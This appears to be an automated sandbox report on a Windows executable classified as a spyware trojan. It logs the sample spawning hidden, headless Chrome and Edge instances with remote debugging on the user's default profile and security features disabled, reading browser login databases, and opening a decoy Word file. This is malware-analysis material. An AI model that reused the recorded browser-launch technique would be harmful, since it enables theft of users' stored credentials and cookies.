      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD943BB9300_2_00007FFD943BB930
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD9445D9400_2_00007FFD9445D940
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD943E69120_2_00007FFD943E6912
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD944069D00_2_00007FFD944069D0
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD944389800_2_00007FFD94438980
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD94427A300_2_00007FFD94427A30
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD94467A300_2_00007FFD94467A30
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD9448FA100_2_00007FFD9448FA10
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD943D7A000_2_00007FFD943D7A00
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD94449AB00_2_00007FFD94449AB0
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD94440A600_2_00007FFD94440A60
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD943E2A900_2_00007FFD943E2A90
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD943E4B200_2_00007FFD943E4B20
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD943BAAE60_2_00007FFD943BAAE6
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD943BFBB00_2_00007FFD943BFBB0
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD943EFBD00_2_00007FFD943EFBD0
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD943E8B600_2_00007FFD943E8B60
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD94487C200_2_00007FFD94487C20
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD943B2BE00_2_00007FFD943B2BE0
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD943B8BF00_2_00007FFD943B8BF0
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: String function: 00007FFD943C4970 appears 110 times
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: String function: 00007FFD944A1F90 appears 31 times
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: String function: 00007FFD943D8730 appears 306 times
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: String function: 00007FFD94478EA0 appears 206 times
      Source: StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3C42000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameEntityFramework.dllV vs StL9joVVcT.exe
      Source: StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3C42000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs StL9joVVcT.exe
      Source: StL9joVVcT.exe, 00000000.00000002.2446112346.000001F4E7CAE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWinWord.exeB vs StL9joVVcT.exe
      Source: StL9joVVcT.exe, 00000000.00000002.2453128769.00007FF7E4241000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameoke.dll@ vs StL9joVVcT.exe
      Source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: get_Language$get_LegalCopyright&get_LegalTrademarks(get_OriginalFilename get_PrivateBuild(get_ProductBuildPart(get_ProductMajorPart(get_ProductMinorPart vs StL9joVVcT.exe
      Source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: _legalCopyright"_originalFilename vs StL9joVVcT.exe
      Source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename vs StL9joVVcT.exe
      Source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSQLitePCLRaw.core.dllV vs StL9joVVcT.exe
      Source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSystem.Data.SQLite.dllF vs StL9joVVcT.exe
      Source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSystem.IO.Compression.dll@ vs StL9joVVcT.exe
      Source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSystem.Security.Cryptography.ProtectedData.dll@ vs StL9joVVcT.exe
      Source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSystem.Management.dll@ vs StL9joVVcT.exe
      Source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSystem.Diagnostics.Process.dll@ vs StL9joVVcT.exe
      Source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSQLitePCLRaw.provider.e_sqlite3.dllV vs StL9joVVcT.exe
      Source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSQLitePCLRaw.batteries_v2.dllV vs StL9joVVcT.exe
      Source: StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: get_Language$get_LegalCopyright&get_LegalTrademarks(get_OriginalFilename get_PrivateBuild(get_ProductBuildPart(get_ProductMajorPart(get_ProductMinorPart vs StL9joVVcT.exe
      Source: StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: _legalCopyright"_originalFilename vs StL9joVVcT.exe
      Source: StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename vs StL9joVVcT.exe
      Source: StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSQLitePCLRaw.core.dllV vs StL9joVVcT.exe
      Source: StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSystem.Data.SQLite.dllF vs StL9joVVcT.exe
      Source: StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSystem.IO.Compression.dll@ vs StL9joVVcT.exe
      Source: StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSystem.Security.Cryptography.ProtectedData.dll@ vs StL9joVVcT.exe
      Source: StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSystem.Management.dll@ vs StL9joVVcT.exe
      Source: StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSystem.Diagnostics.Process.dll@ vs StL9joVVcT.exe
      Source: StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSQLitePCLRaw.provider.e_sqlite3.dllV vs StL9joVVcT.exe
      Source: StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSQLitePCLRaw.batteries_v2.dllV vs StL9joVVcT.exe
      Source: StL9joVVcT.exeBinary or memory string: get_Language$get_LegalCopyright&get_LegalTrademarks(get_OriginalFilename get_PrivateBuild(get_ProductBuildPart(get_ProductMajorPart(get_ProductMinorPart vs StL9joVVcT.exe
      Source: StL9joVVcT.exeBinary or memory string: _legalCopyright"_originalFilename vs StL9joVVcT.exe
      Source: StL9joVVcT.exeBinary or memory string: OriginalFilename vs StL9joVVcT.exe
      Source: classification engineClassification label: mal80.troj.spyw.winEXE@16/21@5/6
      Source: C:\Users\user\Desktop\StL9joVVcT.exeFile created: C:\Users\Public\Documents\638724340810195450Jump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeFile created: C:\Users\user\AppData\Local\Temp\tmps0ptin.tmpJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: StL9joVVcT.exe, 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmp, StL9joVVcT.exe, 00000000.00000002.2449279202.000001F4EC4D9000.00000004.00001000.00020000.00000000.sdmp, e_sqlite3.dll.0.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
      Source: StL9joVVcT.exe, StL9joVVcT.exe, 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmp, StL9joVVcT.exe, 00000000.00000002.2449279202.000001F4EC4D9000.00000004.00001000.00020000.00000000.sdmp, e_sqlite3.dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
      Source: StL9joVVcT.exe, StL9joVVcT.exe, 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmp, StL9joVVcT.exe, 00000000.00000002.2449279202.000001F4EC4D9000.00000004.00001000.00020000.00000000.sdmp, e_sqlite3.dll.0.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
      Source: StL9joVVcT.exe, StL9joVVcT.exe, 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmp, StL9joVVcT.exe, 00000000.00000002.2449279202.000001F4EC4D9000.00000004.00001000.00020000.00000000.sdmp, e_sqlite3.dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
      Source: StL9joVVcT.exe, StL9joVVcT.exe, 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmp, StL9joVVcT.exe, 00000000.00000002.2449279202.000001F4EC4D9000.00000004.00001000.00020000.00000000.sdmp, e_sqlite3.dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
      Source: StL9joVVcT.exe, StL9joVVcT.exe, 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmp, StL9joVVcT.exe, 00000000.00000002.2449279202.000001F4EC4D9000.00000004.00001000.00020000.00000000.sdmp, e_sqlite3.dll.0.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
      Source: StL9joVVcT.exe, 00000000.00000003.2404771613.0000023580079000.00000004.00000020.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000003.2404225489.00000235806C6000.00000004.00000020.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000003.2444736966.00000235806C6000.00000004.00000020.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000003.2443525472.00000235806C6000.00000004.00000020.00020000.00000000.sdmp, Default_LoginDataTemp.db.0.dr, tmpon2qcj.tmp.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
      Source: StL9joVVcT.exe, StL9joVVcT.exe, 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmp, StL9joVVcT.exe, 00000000.00000002.2449279202.000001F4EC4D9000.00000004.00001000.00020000.00000000.sdmp, e_sqlite3.dll.0.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
      Source: unknownProcess created: C:\Users\user\Desktop\StL9joVVcT.exe "C:\Users\user\Desktop\StL9joVVcT.exe"
      Source: C:\Users\user\Desktop\StL9joVVcT.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9286 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless
      Source: C:\Users\user\Desktop\StL9joVVcT.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9478 --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1328 --field-trial-handle=1468,i,7079440847990403330,1816915904370043834,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1592 --field-trial-handle=1468,i,8309244581088940151,1706342742700120984,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:8
      Source: C:\Users\user\Desktop\StL9joVVcT.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Documents\Your_Benefits_and_Role.docx" /o ""
      Source: C:\Users\user\Desktop\StL9joVVcT.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9286 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headlessJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9478 --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headlessJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Documents\Your_Benefits_and_Role.docx" /o ""Jump to behavior
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1328 --field-trial-handle=1468,i,7079440847990403330,1816915904370043834,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3Jump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1592 --field-trial-handle=1468,i,8309244581088940151,1706342742700120984,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:8Jump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: unknown unknownJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeSection loaded: icu.dllJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeSection loaded: wshunix.dllJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeSection loaded: winrnr.dllJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeSection loaded: nlaapi.dllJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeSection loaded: wshbth.dllJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeSection loaded: devobj.dllJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeSection loaded: pnrpnsp.dllJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeSection loaded: napinsp.dllJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeSection loaded: vcruntime140_1.dllJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeSection loaded: vcruntime140.dllJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeSection loaded: msvcp140.dllJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeSection loaded: xmllite.dllJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeSection loaded: mlang.dllJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeSection loaded: slc.dllJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeSection loaded: e_sqlite3.dllJump to behavior
      Source: C:\Users\user\Desktop\StL9joVVcT.exeSection loaded: ntmarta.dllJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
      Source: StL9joVVcT.exeStatic PE information: Image base 0x140000000 > 0x60000000
      Source: StL9joVVcT.exeStatic file information: File size 26503168 > 1048576
      Source: StL9joVVcT.exeStatic PE information: Raw size of .managed is bigger than: 0x100000 < 0x83f800
      Source: StL9joVVcT.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0xfbb400
      Source: StL9joVVcT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
      Source: StL9joVVcT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
      Source: StL9joVVcT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
      Source: StL9joVVcT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: StL9joVVcT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
      Source: StL9joVVcT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
      Source: StL9joVVcT.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: StL9joVVcT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.core\obj\Release\netstandard2.0\SQLitePCLRaw.core.pdbSHA256r source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.core\obj\Release\netstandard2.0\SQLitePCLRaw.core.pdb source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.ProtectedData/Release/net8.0/System.Security.Cryptography.ProtectedData.pdb source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net6.0/Newtonsoft.Json.pdb source: StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3C42000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.Compression\Release\net8.0-windows\System.IO.Compression.pdb source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/artifacts/obj/EntityFramework/Release/netstandard2.1/EntityFramework.pdbSHA256kX source: StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3C42000.00000002.00000001.01000000.00000003.sdmp
